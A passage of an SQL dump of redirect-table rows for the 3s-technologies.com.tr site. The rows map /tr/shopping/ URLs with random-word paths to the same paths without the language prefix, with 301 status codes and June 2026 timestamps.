00:00:00',301),(68923,'https://3s-technologies.com.tr/tr/shopping/yoncopin/1782500716.html',NULL,'https://3s-technologies.com.tr/shopping/yoncopin/1782500716.html','',1,0,'2026-06-11 00:39:41','0000-00-00 00:00:00',301),(68924,'https://3s-technologies.com.tr/tr/shopping/logship/1079230267.html',NULL,'https://3s-technologies.com.tr/shopping/logship/1079230267.html','',1,0,'2026-06-11 00:39:44','0000-00-00 00:00:00',301),(68925,'https://3s-technologies.com.tr/tr/shopping/entablement/1446437235.html',NULL,'https://3s-technologies.com.tr/shopping/entablement/1446437235.html','',1,0,'2026-06-11 00:39:50','0000-00-00 00:00:00',301),(68926,'https://3s-technologies.com.tr/tr/shopping/acidulate/507052362.html',NULL,'https://3s-technologies.com.tr/shopping/acidulate/507052362.html','',1,0,'2026-06-11 00:39:55','0000-00-00 00:00:00',301),(68927,'https://3s-technologies.com.tr/tr/shopping/obnoxious/3477517180.html',NULL,'https://3s-technologies.com.tr/shopping/obnoxious/3477517180.html','',1,0,'2026-06-11 00:39:58','0000-00-00 00:00:00',301),(68928,'https://3s-technologies.com.tr/tr/shopping/postmastergeneral/4274545039.html',NULL,'https://3s-technologies.com.tr/shopping/postmastergeneral/4274545039.html','',1,0,'2026-06-11 00:40:00','0000-00-00 00:00:00',301),(68929,'https://3s-technologies.com.tr/tr/shopping/phytozoon/984121090.html',NULL,'https://3s-technologies.com.tr/shopping/phytozoon/984121090.html','',1,0,'2026-06-11 00:40:03','0000-00-00 00:00:00',301),(68930,'https://3s-technologies.com.tr/tr/shopping/bilinguist/208494599.html',NULL,'https://3s-technologies.com.tr/shopping/bilinguist/208494599.html','',1,0,'2026-06-11 00:40:06','0000-00-00 00:00:00',301),(68931,'https://3s-technologies.com.tr/tr/shopping/parentele/2738633477.html',NULL,'https://3s-technologies.com.tr/shopping/parentele/2738633477.html','',1,0,'2026-06-11 00:40:09','0000-00-00 00:00:00',301),(68932,'https://3s-technologies.com.tr/tr/shopping/brank/2981357652.html',NULL,'https://3s-technologies.com.tr/shopping/brank/2981357652.html','',1,0,'2026-06-11 00:40:12','0000-00-00 00:00:00',301),(68933,'https://3s-technologies.com.tr/tr/shopping/metamorphism/2477594986.html',NULL,'https://3s-technologies.com.tr/shopping/metamorphism/2477594986.html','',1,0,'2026-06-11 00:40:15','0000-00-00 00:00:00',301),(68934,'https://3s-technologies.com.tr/tr/shopping/severalities/3981951670.html',NULL,'https://3s-technologies.com.tr/shopping/severalities/3981951670.html','',1,0,'2026-06-11 00:40:18','0000-00-00 00:00:00',301),(68935,'https://3s-technologies.com.tr/tr/shopping/boyaux/1036480901.html',NULL,'https://3s-technologies.com.tr/shopping/boyaux/1036480901.html','',1,0,'2026-06-11 00:40:23','0000-00-00 00:00:00',301),(68936,'https://3s-technologies.com.tr/tr/shopping/reenjoy/3163020360.html',NULL,'https://3s-technologies.com.tr/shopping/reenjoy/3163020360.html','',1,0,'2026-06-11 00:40:27','0000-00-00 00:00:00',301),(68937,'https://3s-technologies.com.tr/tr/shopping/forepromised/653178569.html',NULL,'https://3s-technologies.com.tr/shopping/forepromised/653178569.html','',1,0,'2026-06-11 00:40:30','0000-00-00 00:00:00',301),(68938,'https://3s-technologies.com.tr/tr/shopping/kindliest/3800749672.html',NULL,'https://3s-technologies.com.tr/shopping/kindliest/3800749672.html','',1,0,'2026-06-11 00:40:33','0000-00-00 00:00:00',301),(68939,'https://3s-technologies.com.tr/tr/shopping/roily/952295890.html',NULL,'https://3s-technologies.com.tr/shopping/roily/952295890.html','',1,0,'2026-06-11 00:40:36','0000-00-00 00:00:00',301),(68940,'https://3s-technologies.com.tr/tr/shopping/draymen/3264636405.html',NULL,'https://3s-technologies.com.tr/shopping/draymen/3264636405.html','',1,0,'2026-06-11 00:40:39','0000-00-00 00:00:00',301),(68941,'https://3s-technologies.com.tr/tr/shopping/passively/2022800677.html',NULL,'https://3s-technologies.com.tr/shopping/passively/2022800677.html','',1,0,'2026-06-11 00:40:43','0000-00-00 00:00:00',301),(68942,'https://3s-technologies.com.tr/tr/shopping/boodle/552015224.html',NULL,'https://3s-technologies.com.tr/shopping/boodle/552015224.html','',1,0,'2026-06-11 00:40:45','0000-00-00 00:00:00',301),(68943,'https://3s-technologies.com.tr/tr/shopping/splenitive/2049873582.html',NULL,'https://3s-technologies.com.tr/shopping/splenitive/2049873582.html','',1,0,'2026-06-11 00:40:49','0000-00-00 00:00:00',301),(68944,'https://3s-technologies.com.tr/tr/shopping/tobacconing/482520815.html',NULL,'https://3s-technologies.com.tr/shopping/tobacconing/482520815.html','',1,0,'2026-06-11 00:40:51','0000-00-00 00:00:00',301),(68945,'https://3s-technologies.com.tr/tr/shopping/quech/2669139068.html',NULL,'https://3s-technologies.com.tr/shopping/quech/2669139068.html','',1,0,'2026-06-11 00:40:56','0000-00-00 00:00:00',301),(68946,'https://3s-technologies.com.tr/tr/shopping/boracous/3217017632.html',NULL,'https://3s-technologies.com.tr/shopping/boracous/3217017632.html','',1,0,'2026-06-11 00:40:58','0000-00-00 00:00:00',301),(68947,'https://3s-technologies.com.tr/tr/shopping/chitinous/986285680.html',NULL,'https://3s-technologies.com.tr/shopping/chitinous/986285680.html','',1,0,'2026-06-11 00:41:01','0000-00-00 00:00:00',301),(68948,'https://3s-technologies.com.tr/tr/shopping/psycho/2288820476.html',NULL,'https://3s-technologies.com.tr/shopping/psycho/2288820476.html','',1,0,'2026-06-11 00:41:04','0000-00-00 00:00:00',301),(68949,'https://3s-technologies.com.tr/tr/shopping/dimness/1642267901.html',NULL,'https://3s-technologies.com.tr/shopping/dimness/1642267901.html','',1,0,'2026-06-11 00:41:07','0000-00-00 00:00:00',301),(68950,'https://3s-technologies.com.tr/tr/shopping/assisted/3256507421.html',NULL,'https://3s-technologies.com.tr/shopping/assisted/3256507421.html','',1,0,'2026-06-11 00:41:10','0000-00-00 00:00:00',301),(68951,'https://3s-technologies.com.tr/tr/shopping/harmonical/833054410.html',NULL,'https://3s-technologies.com.tr/shopping/harmonical/833054410.html','',1,0,'2026-06-11 00:41:13','0000-00-00 00:00:00',301),(68952,'https://3s-technologies.com.tr/tr/shopping/idyll/3211216729.html',NULL,'https://3s-technologies.com.tr/shopping/idyll/3211216729.html','',1,0,'2026-06-11 00:41:16','0000-00-00 00:00:00',301),(68953,'https://3s-technologies.com.tr/tr/shopping/saperda/4062876379.html',NULL,'https://3s-technologies.com.tr/shopping/saperda/4062876379.html','',1,0,'2026-06-11 00:41:21','0000-00-00 00:00:00',301),(68954,'https://3s-technologies.com.tr/tr/shopping/equipping/789167954.html',NULL,'https://3s-technologies.com.tr/shopping/equipping/789167954.html','',1,0,'2026-06-11 00:41:25','0000-00-00 00:00:00',301),(68955,'https://3s-technologies.com.tr/tr/shopping/stoneclink/178587479.html',NULL,'https://3s-technologies.com.tr/shopping/stoneclink/178587479.html','',1,0,'2026-06-11 00:41:30','0000-00-00 00:00:00',301),(68956,'https://3s-technologies.com.tr/tr/shopping/strum/1103943649.html',NULL,'https://3s-technologies.com.tr/shopping/strum/1103943649.html','',1,0,'2026-06-11 00:41:32','0000-00-00 00:00:00',301),(68957,'https://3s-technologies.com.tr/tr/shopping/cithara/827090016.html',NULL,'https://3s-technologies.com.tr/shopping/cithara/827090016.html','',1,0,'2026-06-11 00:41:35','0000-00-00 00:00:00',301),(68958,'https://3s-technologies.com.tr/tr/shopping/arkite/3009119465.html',NULL,'https://3s-technologies.com.tr/shopping/arkite/3009119465.html','',1,0,'2026-06-11 00:41:38','0000-00-00 00:00:00',301),(68959,'https://3s-technologies.com.tr/tr/shopping/pouch/719289550.html',NULL,'https://3s-technologies.com.tr/shopping/pouch/719289550.html','',1,0,'2026-06-11 00:41:41','0000-00-00 00:00:00',301),(68960,'https://3s-technologies.com.tr/tr/shopping/wageearning/1012816111.html',NULL,'https://3s-technologies.com.tr/shopping/wageearning/1012816111.html','',1,0,'2026-06-11 00:41:44','0000-00-00 00:00:00',301),(68961,'https://3s-technologies.com.tr/tr/shopping/evacuation/1177016923.html',NULL,'https://3s-technologies.com.tr/shopping/evacuation/1177016923.html','',1,0,'2026-06-11 00:41:48','0000-00-00 00:00:00',301),(68962,'https://3s-technologies.com.tr/tr/shopping/their/1949772827.html',NULL,'https://3s-technologies.com.tr/shopping/their/1949772827.html','',1,0,'2026-06-11 00:41:50','0000-00-00 00:00:00',301),(68963,'https://3s-technologies.com.tr/tr/shopping/substantiation/1259335534.html',NULL,'https://3s-technologies.com.tr/shopping/substantiation/1259335534.html','',1,0,'2026-06-11 00:41:53','0000-00-00 00:00:00',301),(68964,'https://3s-technologies.com.tr/tr/shopping/overconfident/2575941200.html',NULL,'https://3s-technologies.com.tr/shopping/overconfident/2575941200.html','',1,0,'2026-06-11 00:41:56','0000-00-00 00:00:00',301),(68965,'https://3s-technologies.com.tr/tr/shopping/schoolman/3865758653.html',NULL,'https://3s-technologies.com.tr/shopping/schoolman/3865758653.html','',1,0,'2026-06-11 00:42:03','0000-00-00 00:00:00',301),(68966,'https://3s-technologies.com.tr/tr/shopping/fantail/3525927733.html',NULL,'https://3s-technologies.com.tr/shopping/fantail/3525927733.html','',1,0,'2026-06-11 00:42:07','0000-00-00 00:00:00',301),(68967,'https://3s-technologies.com.tr/tr/shopping/bibliography/2184673391.html',NULL,'https://3s-technologies.com.tr/shopping/bibliography/2184673391.html','',1,0,'2026-06-11 00:42:10','0000-00-00 00:00:00',301),(68968,'https://3s-technologies.com.tr/tr/shopping/pulseless/1271381466.html',NULL,'https://3s-technologies.com.tr/shopping/pulseless/1271381466.html','',1,0,'2026-06-11 00:42:13','0000-00-00 00:00:00',301),(68969,'https://3s-technologies.com.tr/tr/shopping/sandyx/2565534425.html',NULL,'https://3s-technologies.com.tr/shopping/sandyx/2565534425.html','',1,0,'2026-06-11 00:42:16','0000-00-00 00:00:00',301),(68970,'https://3s-technologies.com.tr/tr/shopping/dermatologic/1243127888.html',NULL,'https://3s-technologies.com.tr/shopping/dermatologic/1243127888.html','',1,0,'2026-06-11 00:42:19','0000-00-00 00:00:00',301),(68971,'https://3s-technologies.com.tr/tr/shopping/addled/2943008500.html',NULL,'https://3s-technologies.com.tr/shopping/addled/2943008500.html','',1,0,'2026-06-11 00:42:22','0000-00-00 00:00:00',301),(68972,'https://3s-technologies.com.tr/tr/shopping/reconciling/2356534290.html',NULL,'https://3s-technologies.com.tr/shopping/reconciling/2356534290.html','',1,0,'2026-06-11 00:42:25','0000-00-00 00:00:00',301),(68973,'https://3s-technologies.com.tr/tr/shopping/chaptrel/661420754.html',NULL,'https://3s-technologies.com.tr/shopping/chaptrel/661420754.html','',1,0,'2026-06-11 00:42:28','0000-00-00 00:00:00',301),(68974,'https://3s-technologies.com.tr/tr/shopping/ventilated/2630660518.html',NULL,'https://3s-technologies.com.tr/shopping/ventilated/2630660518.html','',1,0,'2026-06-11 00:42:31','0000-00-00 00:00:00',301),(68975,'https://3s-technologies.com.tr/tr/shopping/albumenize/4220202425.html',NULL,'https://3s-technologies.com.tr/shopping/albumenize/4220202425.html','',1,0,'2026-06-11 00:42:36','0000-00-00 00:00:00',301),(68976,'https://3s-technologies.com.tr/tr/shopping/zoologist/3789308690.html',NULL,'https://3s-technologies.com.tr/shopping/zoologist/3789308690.html','',1,0,'2026-06-11 00:42:40','0000-00-00 00:00:00',301),(68977,'https://3s-technologies.com.tr/tr/shopping/turbanshell/2346588241.html',NULL,'https://3s-technologies.com.tr/shopping/turbanshell/2346588241.html','',1,0,'2026-06-11 00:42:43','0000-00-00 00:00:00',301),(68978,'https://3s-technologies.com.tr/tr/shopping/adjute/2193179111.html',NULL,'https://3s-technologies.com.tr/shopping/adjute/2193179111.html','',1,0,'2026-06-11 00:42:46','0000-00-00 00:00:00',301),(68979,'https://3s-technologies.com.tr/tr/shopping/medaled/1200518206.html',NULL,'https://3s-technologies.com.tr/shopping/medaled/1200518206.html','',1,0,'2026-06-11 00:42:49','0000-00-00 00:00:00',301),(68980,'https://3s-technologies.com.tr/tr/shopping/scrapbook/46087984.html',NULL,'https://3s-technologies.com.tr/shopping/scrapbook/46087984.html','',1,0,'2026-06-11 00:42:52','0000-00-00 00:00:00',301),(68981,'https://3s-technologies.com.tr/tr/shopping/donne/130176926.html',NULL,'https://3s-technologies.com.tr/shopping/donne/130176926.html','',1,0,'2026-06-11 00:42:55','0000-00-00 00:00:00',301),(68982,'https://3s-technologies.com.tr/tr/shopping/mesen/4173364610.html',NULL,'https://3s-technologies.com.tr/shopping/mesen/4173364610.html','',1,0,'2026-06-11 00:42:58','0000-00-00 00:00:00',301),(68983,'https://3s-technologies.com.tr/tr/shopping/rubida/1121462226.html',NULL,'https://3s-technologies.com.tr/shopping/rubida/1121462226.html','',1,0,'2026-06-11 00:43:01','0000-00-00 00:00:00',301),(68984,'https://3s-technologies.com.tr/tr/shopping/glossae/631071204.html',NULL,'https://3s-technologies.com.tr/shopping/glossae/631071204.html','',1,0,'2026-06-11 00:43:04','0000-00-00 00:00:00',301),(68985,'https://3s-technologies.com.tr/tr/shopping/supermundane/2124504281.html',NULL,'https://3s-technologies.com.tr/shopping/supermundane/2124504281.html','',1,0,'2026-06-11 00:43:10','0000-00-00 00:00:00',301),(68986,'https://3s-technologies.com.tr/tr/shopping/outrival/1397749101.html',NULL,'https://3s-technologies.com.tr/shopping/outrival/1397749101.html','',1,0,'2026-06-11 00:43:13','0000-00-00 00:00:00',301),(68987,'https://3s-technologies.com.tr/tr/shopping/echinocactus/1058588266.html',NULL,'https://3s-technologies.com.tr/shopping/echinocactus/1058588266.html','',1,0,'2026-06-11 00:43:16','0000-00-00 00:00:00',301),(68988,'https://3s-technologies.com.tr/tr/shopping/perpetuating/1360269453.html',NULL,'https://3s-technologies.com.tr/shopping/perpetuating/1360269453.html','',1,0,'2026-06-11 00:43:19','0000-00-00 00:00:00',301),(68989,'https://3s-technologies.com.tr/tr/shopping/crossmate/3541086803.html',NULL,'https://3s-technologies.com.tr/shopping/crossmate/3541086803.html','',1,0,'2026-06-11 00:43:22','0000-00-00 00:00:00',301),(68990,'https://3s-technologies.com.tr/tr/shopping/filler/1297911897.html',NULL,'https://3s-technologies.com.tr/shopping/filler/1297911897.html','',1,0,'2026-06-11 00:43:26','0000-00-00 00:00:00',301),(68991,'https://3s-technologies.com.tr/tr/shopping/relaxative/3168984786.html',NULL,'https://3s-technologies.com.tr/shopping/relaxative/3168984786.html','',1,0,'2026-06-11 00:43:28','0000-00-00 00:00:00',301),(68992,'https://3s-technologies.com.tr/tr/shopping/bloodroot/4079624284.html',NULL,'https://3s-technologies.com.tr/shopping/bloodroot/4079624284.html','',1,0,'2026-06-11 00:43:31','0000-00-00 00:00:00',301),(68993,'https://3s-technologies.com.tr/tr/shopping/caesural/3513161483.html',NULL,'https://3s-technologies.com.tr/shopping/caesural/3513161483.html','',1,0,'2026-06-11 00:43:34','0000-00-00 00:00:00',301),(68994,'https://3s-technologies.com.tr/tr/shopping/forstraught/405612325.html',NULL,'https://3s-technologies.com.tr/shopping/forstraught/405612325.html','',1,0,'2026-06-11 00:43:37','0000-00-00 00:00:00',301),(68995,'https://3s-technologies.com.tr/tr/shopping/discant/26145193.html',NULL,'https://3s-technologies.com.tr/shopping/discant/26145193.html','',1,0,'2026-06-11 00:43:42','0000-00-00 00:00:00',301),(68996,'https://3s-technologies.com.tr/tr/shopping/insatiable/165657690.html',NULL,'https://3s-technologies.com.tr/shopping/insatiable/165657690.html','',1,0,'2026-06-11 00:43:44','0000-00-00 00:00:00',301),(68997,'https://3s-technologies.com.tr/tr/shopping/unconcern/2249799484.html',NULL,'https://3s-technologies.com.tr/shopping/unconcern/2249799484.html','',1,0,'2026-06-11 00:43:47','0000-00-00 00:00:00',301),(68998,'https://3s-technologies.com.tr/tr/shopping/agnathan/1041953530.html',NULL,'https://3s-technologies.com.tr/shopping/agnathan/1041953530.html','',1,0,'2026-06-11 00:43:50','0000-00-00 00:00:00',301),(68999,'https://3s-technologies.com.tr/tr/shopping/strictness/4233525179.html',NULL,'https://3s-technologies.com.tr/shopping/strictness/4233525179.html','',1,0,'2026-06-11 00:43:53','0000-00-00 00:00:00',301),(69000,'https://3s-technologies.com.tr/tr/shopping/melanoleuca/1486523903.html',NULL,'https://3s-technologies.com.tr/shopping/melanoleuca/1486523903.html','',1,0,'2026-06-11 00:43:56','0000-00-00 00:00:00',301),(69001,'https://3s-technologies.com.tr/tr/shopping/producers/325130062.html',NULL,'https://3s-technologies.com.tr/shopping/producers/325130062.html','',1,0,'2026-06-11 00:43:59','0000-00-00 00:00:00',301),(69002,'https://3s-technologies.com.tr/tr/shopping/feronia/16854464.html',NULL,'https://3s-technologies.com.tr/shopping/feronia/16854464.html','',1,0,'2026-06-11 00:44:02','0000-00-00 00:00:00',301),(69003,'https://3s-technologies.com.tr/tr/shopping/synonyms/1578509656.html',NULL,'https://3s-technologies.com.tr/shopping/synonyms/1578509656.html','',1,0,'2026-06-11 00:44:07','0000-00-00 00:00:00',301),(69004,'https://3s-technologies.com.tr/tr/shopping/equipondious/2226626459.html',NULL,'https://3s-technologies.com.tr/shopping/equipondious/2226626459.html','',1,0,'2026-06-11 00:44:09','0000-00-00 00:00:00',301),(69005,'https://3s-technologies.com.tr/tr/shopping/purifier/3314831642.html',NULL,'https://3s-technologies.com.tr/shopping/purifier/3314831642.html','',1,0,'2026-06-11 00:44:12','0000-00-00 00:00:00',301),(69006,'https://3s-technologies.com.tr/tr/shopping/grantor/690052055.html',NULL,'https://3s-technologies.com.tr/shopping/grantor/690052055.html','',1,0,'2026-06-11 00:44:15','0000-00-00 00:00:00',301),(69007,'https://3s-technologies.com.tr/tr/shopping/cullibility/2645966043.html',NULL,'https://3s-technologies.com.tr/shopping/cullibility/2645966043.html','',1,0,'2026-06-11 00:44:18','0000-00-00 00:00:00',301),(69008,'https://3s-technologies.com.tr/tr/shopping/swoop/1771227200.html',NULL,'https://3s-technologies.com.tr/shopping/swoop/1771227200.html','',1,0,'2026-06-11 00:44:21','0000-00-00 00:00:00',301),(69009,'https://3s-technologies.com.tr/tr/shopping/schematist/2806087683.html',NULL,'https://3s-technologies.com.tr/shopping/schematist/2806087683.html','',1,0,'2026-06-11 00:44:24','0000-00-00 00:00:00',301),(69010,'https://3s-technologies.com.tr/tr/shopping/celtis/850409464.html',NULL,'https://3s-technologies.com.tr/shopping/celtis/850409464.html','',1,0,'2026-06-11 00:44:27','0000-00-00 00:00:00',301),(69011,'https://3s-technologies.com.tr/tr/shopping/diagnosing/431701345.html',NULL,'https://3s-technologies.com.tr/shopping/diagnosing/431701345.html','',1,0,'2026-06-11 00:44:30','0000-00-00 00:00:00',301),(69012,'https://3s-technologies.com.tr/tr/shopping/misthrive/317672886.html',NULL,'https://3s-technologies.com.tr/shopping/misthrive/317672886.html','',1,0,'2026-06-11 00:44:33','0000-00-00 00:00:00',301),(69013,'https://3s-technologies.com.tr/tr/shopping/chazy/1502059709.html',NULL,'https://3s-technologies.com.tr/shopping/chazy/1502059709.html','',1,0,'2026-06-11 00:44:40','0000-00-00 00:00:00',301),(69014,'https://3s-technologies.com.tr/tr/shopping/underbuilding/1137669872.html',NULL,'https://3s-technologies.com.tr/shopping/underbuilding/1137669872.html','',1,0,'2026-06-11 00:44:44','0000-00-00 00:00:00',301),(69015,'https://3s-technologies.com.tr/tr/shopping/lustier/3119230976.html',NULL,'https://3s-technologies.com.tr/shopping/lustier/3119230976.html','',1,0,'2026-06-11 00:44:47','0000-00-00 00:00:00',301),(69016,'https://3s-technologies.com.tr/tr/shopping/concenter/2698679293.html',NULL,'https://3s-technologies.com.tr/shopping/concenter/2698679293.html','',1,0,'2026-06-11 00:44:50','0000-00-00 00:00:00',301),(69017,'https://3s-technologies.com.tr/tr/shopping/recompact/4179182565.html',NULL,'https://3s-technologies.com.tr/shopping/recompact/4179182565.html','',1,0,'2026-06-11 00:44:53','0000-00-00 00:00:00',301),(69018,'https://3s-technologies.com.tr/tr/shopping/warmblooded/1483147214.html',NULL,'https://3s-technologies.com.tr/shopping/warmblooded/1483147214.html','',1,0,'2026-06-11 00:44:56','0000-00-00 00:00:00',301),(69019,'https://3s-technologies.com.tr/tr/shopping/selfcentringa/177211873.html',NULL,'https://3s-technologies.com.tr/shopping/selfcentringa/177211873.html','',1,0,'2026-06-11 00:44:59','0000-00-00 00:00:00',301),(69020,'https://3s-technologies.com.tr/tr/shopping/entoperipheral/502791832.html',NULL,'https://3s-technologies.com.tr/shopping/entoperipheral/502791832.html','',1,0,'2026-06-11 00:45:02','0000-00-00 00:00:00',301),(69021,'https://3s-technologies.com.tr/tr/shopping/beefalo/1997546065.html',NULL,'https://3s-technologies.com.tr/shopping/beefalo/1997546065.html','',1,0,'2026-06-11 00:45:05','0000-00-00 00:00:00',301),(69022,'https://3s-technologies.com.tr/tr/shopping/transversally/3604983729.html',NULL,'https://3s-technologies.com.tr/shopping/transversally/3604983729.html','',1,0,'2026-06-11 00:45:08','0000-00-00 00:00:00',301),(69023,'https://3s-technologies.com.tr/tr/shopping/castanopes/274228844.html',NULL,'https://3s-technologies.com.tr/shopping/castanopes/274228844.html','',1,0,'2026-06-11 00:45:14','0000-00-00 00:00:00',301),(69024,'https://3s-technologies.com.tr/tr/shopping/loculicidal/445420086.html',NULL,'https://3s-technologies.com.tr/shopping/loculicidal/445420086.html','',1,0,'2026-06-11 00:45:18','0000-00-00 00:00:00',301),(69025,'https://3s-technologies.com.tr/tr/shopping/juxtaposition/1617390980.html',NULL,'https://3s-technologies.com.tr/shopping/juxtaposition/1617390980.html','',1,0,'2026-06-11 00:45:21','0000-00-00 00:00:00',301),(69026,'https://3s-technologies.com.tr/tr/shopping/squabash/1957901811.html',NULL,'https://3s-technologies.com.tr/shopping/squabash/1957901811.html','',1,0,'2026-06-11 00:45:24','0000-00-00 00:00:00',301),(69027,'https://3s-technologies.com.tr/tr/shopping/attend/3527139832.html',NULL,'https://3s-technologies.com.tr/shopping/attend/3527139832.html','',1,0,'2026-06-11 00:45:27','0000-00-00 00:00:00',301),(69028,'https://3s-technologies.com.tr/tr/shopping/smicker/887397024.html',NULL,'https://3s-technologies.com.tr/shopping/smicker/887397024.html','',1,0,'2026-06-11 00:45:30','0000-00-00 00:00:00',301),(69029,'https://3s-technologies.com.tr/tr/shopping/subsistency/2378823474.html',NULL,'https://3s-technologies.com.tr/shopping/subsistency/2378823474.html','',1,0,'2026-06-11 00:45:33','0000-00-00 00:00:00',301),(69030,'https://3s-technologies.com.tr/tr/shopping/gyrencephalous/3641693692.html',NULL,'https://3s-technologies.com.tr/shopping/gyrencephalous/3641693692.html','',1,0,'2026-06-11 00:45:36','0000-00-00 00:00:00',301),(69031,'https://3s-technologies.com.tr/tr/shopping/reflector/1431811.html',NULL,'https://3s-technologies.com.tr/shopping/reflector/1431811.html','',1,0,'2026-06-11 00:45:39','0000-00-00 00:00:00',301),(69032,'https://3s-technologies.com.tr/tr/shopping/molge/3866970752.html',NULL,'https://3s-technologies.com.tr/shopping/molge/3866970752.html','',1,0,'2026-06-11 00:45:42','0000-00-00 00:00:00',301),(69033,'https://3s-technologies.com.tr/tr/shopping/hybridizing/2684636237.html',NULL,'https://3s-technologies.com.tr/shopping/hybridizing/2684636237.html','',1,0,'2026-06-11 00:45:47','0000-00-00 00:00:00',301),(69034,'https://3s-technologies.com.tr/tr/shopping/diestrous/3796160884.html',NULL,'https://3s-technologies.com.tr/shopping/diestrous/3796160884.html','',1,0,'2026-06-11 00:45:52','0000-00-00 00:00:00',301),(69035,'https://3s-technologies.com.tr/tr/shopping/rejectaneous/844495424.html',NULL,'https://3s-technologies.com.tr/shopping/rejectaneous/844495424.html','',1,0,'2026-06-11 00:45:54','0000-00-00 00:00:00',301),(69036,'https://3s-technologies.com.tr/tr/shopping/malefactress/2455422946.html',NULL,'https://3s-technologies.com.tr/shopping/malefactress/2455422946.html','',1,0,'2026-06-11 00:45:57','0000-00-00 00:00:00',301),(69037,'https://3s-technologies.com.tr/tr/shopping/nephrolith/3051072533.html',NULL,'https://3s-technologies.com.tr/shopping/nephrolith/3051072533.html','',1,0,'2026-06-11 00:46:00','0000-00-00 00:00:00',301),(69038,'https://3s-technologies.com.tr/tr/shopping/league/237632050.html',NULL,'https://3s-technologies.com.tr/shopping/league/237632050.html','',1,0,'2026-06-11 00:46:03','0000-00-00 00:00:00',301),(69039,'https://3s-technologies.com.tr/tr/shopping/omissively/221489079.html',NULL,'https://3s-technologies.com.tr/shopping/omissively/221489079.html','',1,0,'2026-06-11 00:46:06','0000-00-00 00:00:00',301),(69040,'https://3s-technologies.com.tr/tr/shopping/sompne/3052284632.html',NULL,'https://3s-technologies.com.tr/shopping/sompne/3052284632.html','',1,0,'2026-06-11 00:46:09','0000-00-00 00:00:00',301),(69041,'https://3s-technologies.com.tr/tr/shopping/amenability/948755678.html',NULL,'https://3s-technologies.com.tr/shopping/amenability/948755678.html','',1,0,'2026-06-11 00:46:12','0000-00-00 00:00:00',301),(69042,'https://3s-technologies.com.tr/tr/shopping/cossus/1216151084.html',NULL,'https://3s-technologies.com.tr/shopping/cossus/1216151084.html','',1,0,'2026-06-11 00:46:15','0000-00-00 00:00:00',301),(69043,'https://3s-technologies.com.tr/tr/shopping/tectibranchiate/1769062610.html',NULL,'https://3s-technologies.com.tr/shopping/tectibranchiate/1769062610.html','',1,0,'2026-06-11 00:46:21','0000-00-00 00:00:00',301),(69044,'https://3s-technologies.com.tr/tr/shopping/corocore/1676370860.html',NULL,'https://3s-technologies.com.tr/shopping/corocore/1676370860.html','',1,0,'2026-06-11 00:46:23','0000-00-00 00:00:00',301),(69045,'https://3s-technologies.com.tr/tr/shopping/bishopsweed/3594313403.html',NULL,'https://3s-technologies.com.tr/shopping/bishopsweed/3594313403.html','',1,0,'2026-06-11 00:46:26','0000-00-00 00:00:00',301),(69046,'https://3s-technologies.com.tr/tr/shopping/papillae/2182249177.html',NULL,'https://3s-technologies.com.tr/shopping/papillae/2182249177.html','',1,0,'2026-06-11 00:46:29','0000-00-00 00:00:00',301),(69047,'https://3s-technologies.com.tr/tr/shopping/adhamant/1720160244.html',NULL,'https://3s-technologies.com.tr/shopping/adhamant/1720160244.html','',1,0,'2026-06-11 00:46:32','0000-00-00 00:00:00',301),(69048,'https://3s-technologies.com.tr/tr/shopping/napoleon/3830820331.html',NULL,'https://3s-technologies.com.tr/shopping/napoleon/3830820331.html','',1,0,'2026-06-11 00:46:35','0000-00-00 00:00:00',301),(69049,'https://3s-technologies.com.tr/tr/shopping/valentines/2394064276.html',NULL,'https://3s-technologies.com.tr/shopping/valentines/2394064276.html','',1,0,'2026-06-11 00:46:38','0000-00-00 00:00:00',301),(69050,'https://3s-technologies.com.tr/tr/shopping/plenitudinary/591822985.html',NULL,'https://3s-technologies.com.tr/shopping/plenitudinary/591822985.html','',1,0,'2026-06-11 00:46:41','0000-00-00 00:00:00',301),(69051,'https://3s-technologies.com.tr/tr/shopping/etiolating/1388177689.html',NULL,'https://3s-technologies.com.tr/shopping/etiolating/1388177689.html','',1,0,'2026-06-11 00:46:44','0000-00-00 00:00:00',301),(69052,'https://3s-technologies.com.tr/tr/shopping/baying/3414668846.html',NULL,'https://3s-technologies.com.tr/shopping/baying/3414668846.html','',1,0,'2026-06-11 00:46:47','0000-00-00 00:00:00',301),(69053,'https://3s-technologies.com.tr/tr/shopping/seneca/2004050734.html',NULL,'https://3s-technologies.com.tr/shopping/seneca/2004050734.html','',1,0,'2026-06-11 00:46:52','0000-00-00 00:00:00',301),(69054,'https://3s-technologies.com.tr/tr/shopping/claspered/2958645337.html',NULL,'https://3s-technologies.com.tr/shopping/claspered/2958645337.html','',1,0,'2026-06-11 00:46:54','0000-00-00 00:00:00',301),(69055,'https://3s-technologies.com.tr/tr/shopping/reforge/1488948085.html',NULL,'https://3s-technologies.com.tr/shopping/reforge/1488948085.html','',1,0,'2026-06-11 00:46:58','0000-00-00 00:00:00',301),(69056,'https://3s-technologies.com.tr/tr/shopping/skink/2880423733.html',NULL,'https://3s-technologies.com.tr/shopping/skink/2880423733.html','',1,0,'2026-06-11 00:47:01','0000-00-00 00:00:00',301),(69057,'https://3s-technologies.com.tr/tr/shopping/nomans/2767492021.html',NULL,'https://3s-technologies.com.tr/shopping/nomans/2767492021.html','',1,0,'2026-06-11 00:47:04','0000-00-00 00:00:00',301),(69058,'https://3s-technologies.com.tr/tr/shopping/queened/2239457400.html',NULL,'https://3s-technologies.com.tr/shopping/queened/2239457400.html','',1,0,'2026-06-11 00:47:07','0000-00-00 00:00:00',301),(69059,'https://3s-technologies.com.tr/tr/shopping/convince/3998258148.html',NULL,'https://3s-technologies.com.tr/shopping/convince/3998258148.html','',1,0,'2026-06-11 00:47:10','0000-00-00 00:00:00',301),(69060,'https://3s-technologies.com.tr/tr/shopping/daman/3723337393.html',NULL,'https://3s-technologies.com.tr/shopping/daman/3723337393.html','',1,0,'2026-06-11 00:47:13','0000-00-00 00:00:00',301),(69061,'https://3s-technologies.com.tr/tr/shopping/churned/1563578816.html',NULL,'https://3s-technologies.com.tr/shopping/churned/1563578816.html','',1,0,'2026-06-11 00:47:16','0000-00-00 00:00:00',301),(69062,'https://3s-technologies.com.tr/tr/shopping/accumulate/481455139.html',NULL,'https://3s-technologies.com.tr/shopping/accumulate/481455139.html','',1,0,'2026-06-11 00:47:24','0000-00-00 00:00:00',301),(69063,'https://3s-technologies.com.tr/tr/shopping/polypodium/1735465753.html',NULL,'https://3s-technologies.com.tr/shopping/polypodium/1735465753.html','',1,0,'2026-06-11 00:47:28','0000-00-00 